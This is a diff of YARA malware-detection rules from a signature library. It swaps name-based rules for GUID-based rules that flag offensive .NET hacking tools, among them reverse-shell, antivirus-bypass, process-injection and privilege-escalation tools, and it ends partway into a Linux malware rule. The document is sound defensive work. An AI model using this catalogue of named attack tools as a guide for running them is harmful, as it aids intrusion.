-		reference = "https://github.com/tophertimzen/shellcodeTester"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L616-L629"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a59e6fe9-dbaf-5830-8cf1-485ff4dd939a"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/SharpShooter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3015-L3029"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3101b62428eba5e36572a190bd3a11f59cf9cca10aec3cfe3000028f1b1f0a3f"
-		score = 50
+		logic_hash = "8a8510a680205c09321b8d1a960f1b8026883aede5224e8fe541727a434312b4"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "shellcodeTester" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "56598f1c-6d88-4994-a392-af337abe5777" ascii wide
+		$typelibguid0up = "56598F1C-6D88-4994-A392-AF337ABE5777" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Gray_Hat_Csharp_Code : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Nomsbuild : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "0a94cadc-cc7b-5817-8788-bb1e53937fad"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/brandonprry/gray_hat_csharp_code"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L631-L644"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9bc0661d-c60f-582b-8f88-87e3dfa13ddd"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/NoMSBuild"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3031-L3047"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4520528cd6b1832c97fa79442f9d448d54bad4e6944984fa6e71f34246259e28"
+		logic_hash = "3979162455153d586036960f3cf2a90a893541900245c4184e55631d2138ba75"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "gray_hat_csharp_code" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "034a7b9f-18df-45da-b870-0e1cef500215" ascii wide
+		$typelibguid0up = "034A7B9F-18DF-45DA-B870-0E1CEF500215" ascii wide
+		$typelibguid1lo = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii wide
+		$typelibguid1up = "59B449D7-C1E8-4F47-80B8-7375178961DB" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Nativepayload_Reverseshell : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Teleshadow2 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "eec77c09-02db-5d74-8526-e201d2fe6fc8"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/DamonMohammadbagher/NativePayload_ReverseShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L646-L659"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5b22f2c4-0bd1-5a5a-8867-8fbc773d2b44"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/ParsingTeam/TeleShadow2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3049-L3065"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79ebde95674d76e58938b06a97cb6c65e6ac0606398fc9c30d90e517bbdd62a8"
+		logic_hash = "effe10487be132548eb56eb5bfc97f394669a153c9a885e3461e5f9e94bf66f8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "NativePayload_ReverseShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii wide
+		$typelibguid0up = "42C5C356-39CF-4C07-96DF-EBB0CCF78CA4" ascii wide
+		$typelibguid1lo = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii wide
+		$typelibguid1up = "0242B5B1-4D26-413E-8C8C-13B4ED30D510" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetavbypass : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Badpotato : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "918eba2b-150d-5e69-bed0-0979ae889165"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mandreko/DotNetAVBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L661-L674"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8bee12fc-fc29-5256-b559-d914ef202c0c"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/BeichenDream/BadPotato"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3067-L3081"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "574a5f1bc1873321042e932ddfd53853e8e06dff3b25f2ad41e6b8aaf150a8b2"
+		logic_hash = "52b80fa9f4738fb8d9ce14f2881e19122219a13e9fc3acdf87ed7bfea371ebc4"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "DotNetAVBypass" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "0527a14f-1591-4d94-943e-d6d784a50549" ascii wide
+		$typelibguid0up = "0527A14F-1591-4D94-943E-D6D784A50549" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Hexyrunner : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lethalhta : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "67741b4d-7336-5c88-8f2c-e48c10b187b9"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/bao7uo/HexyRunner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L676-L689"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e8e1ad03-a5f0-5508-b78d-0de7bdaf4704"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/codewhitesec/LethalHTA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3083-L3099"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c55be1fe285358378a98fd1027650dd20dd8cd0aad4dc062df7a0d4538c78c3b"
+		logic_hash = "c9957f9e0838c5c708afa1651aedb9c6cb003f53c1ce38b200b1526da8fa3a65"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "HexyRunner" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii wide
+		$typelibguid0up = "784CDE17-FF0F-4E43-911A-19119E89C43F" ascii wide
+		$typelibguid1lo = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii wide
+		$typelibguid1up = "7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpoffensiveshell : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstat : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "f223fb95-9f16-5504-a6ce-de9d75b38eaa"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/darkr4y/SharpOffensiveShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L691-L704"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "649c6cc0-e43b-558c-9567-00f352af528b"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/Raikia/SharpStat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3101-L3115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "36bcae7817eed375e48822a49e6875295ea1037217231a7f9ae88a9b8af95530"
+		logic_hash = "8b9193262c5ab6e43d804c964821ab986c038a0ba834b22785e75e846fca649b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "SharpOffensiveShell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii wide
+		$typelibguid0up = "FFC5C721-49C8-448D-8FF4-2E3A7B7CC383" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Reconness : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyservice : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "a30188e4-d96a-59d0-9f51-d7a7e07b14ba"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/reconness/reconness"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L706-L719"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d02d34f0-7aa1-5110-b7ea-670b5fb98150"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/malcomvetter/SneakyService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3117-L3131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9cb7a3522bada1c724999058ec4ddfde09b22166f8fb3ba184dfe6bec276cfc5"
+		logic_hash = "cf35b2709e6a998ee672681d99f91fe5f452ba612bf0c5d9abe20e93d3cb236e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "reconness" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii wide
+		$typelibguid0up = "897819D5-58E0-46A0-8E1A-91EA6A269D84" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Tvasion : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexec : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "324cddc6-36d9-5670-827e-24e80dcc66a9"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/loadenmb/tvasion"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L721-L734"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5faff0aa-9ffe-5ac0-b9e0-ca9f79350036"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/anthemtotheego/SharpExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3133-L3147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6262f751cbb85e702d89e7c5b4efdc8eaf3085101cd7685218ab1e8a2599385"
+		logic_hash = "0a8faa0abbd8654901a5b96dff22a635fd7d429a736fe9406c37e9bb724d2c89"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "tvasion" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii wide
+		$typelibguid0up = "7FBAD126-E21C-4C4E-A9F0-613FCF585A71" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Ibombshell : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcom : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "02f3272f-8e75-5df4-9052-a315ae202050"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Telefonica/ibombshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L736-L749"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "94da3da4-a8aa-5735-9a04-1f2447a330aa"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/rvrsh3ll/SharpCOM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3149-L3163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30de65328e2e2230eca3a30490e20c2c6d8ac9bdc835ee15d44300a00b801921"
+		logic_hash = "c11955ce6a0a56de198b22d3716ce496573374847004a62f4b3a682edaa68ebe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "ibombshell" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii wide
+		$typelibguid0up = "51960F7D-76FE-499F-AFBD-ACABD7BA50D1" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Remoteprocessinjection : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Inception : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "f1698cf2-211a-551a-8bc4-4faefcc6106f"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/Mr-Un1k0d3r/RemoteProcessInjection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L751-L764"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8d18f1d5-9c9a-5258-9f96-fa24b702c6ad"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/two06/Inception"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3165-L3179"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "87d803c361462877f5ebba2a70f611c95b8684fe9f9f747ccf9643fc4e97d9df"
+		logic_hash = "333f2d92dad837ab1d9ce9bfbd0aac790026c9624d7f5e77c7a60fc6c4a72ca0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "RemoteProcessInjection" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "03d96b8c-efd1-44a9-8db2-0b74db5d247a" ascii wide
+		$typelibguid0up = "03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_CACTUSTORCH : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwmi_1 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "7b1e3015-fada-592c-b120-20aa12247d32"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/mdsecactivebreach/CACTUSTORCH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L766-L779"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cd5a1c7b-a45a-5541-b1b0-cf19c991ed22"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		old_rule_name = "HKTL_NET_GUID_sharpwmi"
+		reference = "https://github.com/QAX-A-Team/sharpwmi"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3181-L3196"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51a125a44b5d1e73509bcd29865b26f44a5ee53f6907ee9abffa3eef1bbbdea8"
+		logic_hash = "85e22c021c6d421e97d7ea811b3d3800c487a0185ddab6cb80b2d35cb97a73d7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "CACTUSTORCH" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "bb357d38-6dc1-4f20-a54c-d664bd20677e" ascii wide
+		$typelibguid0up = "BB357D38-6DC1-4F20-A54C-D664BD20677E" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Pandasniper : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1064 : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "006400fb-7e6d-563b-ba78-17937983c9ba"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/QAX-A-Team/PandaSniper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L781-L794"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4640e874-faa4-58dc-a3f3-18246a343f15"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/RythmStick/CVE-2019-1064"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3198-L3212"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c5a32f22a429777186d88f3fcfa79ad4d971e86ebd6117df74aae19728c6addd"
+		logic_hash = "d78b15454af39bca869c07a78550d2b3827ecdd03bcf02a8614e0c8247fcf5c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "PandaSniper" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "ff97e98a-635e-4ea9-b2d0-1a13f6bdbc38" ascii wide
+		$typelibguid0up = "FF97E98A-635E-4EA9-B2D0-1A13F6BDBC38" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Xbapappwhitelistbypasspoc : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Tokenvator : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "b05253ce-cba4-531d-8f39-d8fae71b114d"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L796-L809"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "84ebb6b3-cf11-5172-95d4-d114bfeb0bc7"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xbadjuju/Tokenvator"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3214-L3228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c79b70d3a72084dff391ba297518c4fe748d35b794278c4edf2d1faa4bd216e"
+		logic_hash = "7bd3cc74ea70f247836ed4d0da9602b21e962c6b7b2d8fdf89c9c46ba919fc71"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "xbapAppWhitelistBypassPOC" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "4b2b3bd4-d28f-44cc-96b3-4a2f64213109" ascii wide
+		$typelibguid0up = "4B2B3BD4-D28F-44CC-96B3-4A2F64213109" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_HKTL_NET_NAME_Stagestrike : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Wheresmyimplant : FILE
 {
 	meta:
-		description = "Detects .NET red/black-team tools via name"
-		author = "Arnim Rupp"
-		id = "e3f9de04-87f6-5b07-b5b0-a26167937fcc"
-		date = "2021-01-22"
-		modified = "2024-12-10"
-		reference = "https://github.com/RedXRanger/StageStrike"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_names.yar#L811-L824"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c99523ce-e2c0-5a21-89d1-70c0dd970731"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/0xbadjuju/WheresMyImplant"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3230-L3244"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99abc2fee732f27ea94c8ce244dc1742ed01a7753adedd7e80226d1e1c8dee4a"
+		logic_hash = "0bc82dfd6e07f6ff8a9cb7b6331f3f600db30ee053592422d1eddaff3c46cfdf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$name = "StageStrike" ascii wide
-		$compile = "AssemblyTitle" ascii wide
+		$typelibguid0lo = "cca59e4e-ce4d-40fc-965f-34560330c7e6" ascii wide
+		$typelibguid0up = "CCA59E4E-CE4D-40FC-965F-34560330C7E6" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_LNX_Linux_Malware_Indicators_Aug20_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Naga : FILE
 {
 	meta:
-		description = "Detects indicators often found in linux malware samples. Note: This detection is based on common characteristics typically associated with the mentioned threats, must be considered a clue and does not conclusively prove maliciousness."
-		author = "Florian Roth (Nextron Systems)"
-		id = "9a1093a6-0239-5d1c-aa30-1ca725941583"
-		date = "2020-08-03"
-		modified = "2025-02-12"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_lnx_malware_indicators.yar#L2-L24"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3a9d3154-a8f1-57a4-8b61-498e2ebdfa42"
+		date = "2020-12-28"
+		modified = "2023-04-06"
+		reference = "https://github.com/byt3bl33d3r/Naga"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3246-L3262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbe84c936709653480d469a07e284aea7ef68aedaaa4295073ce59d37eb6d791"
-		score = 65
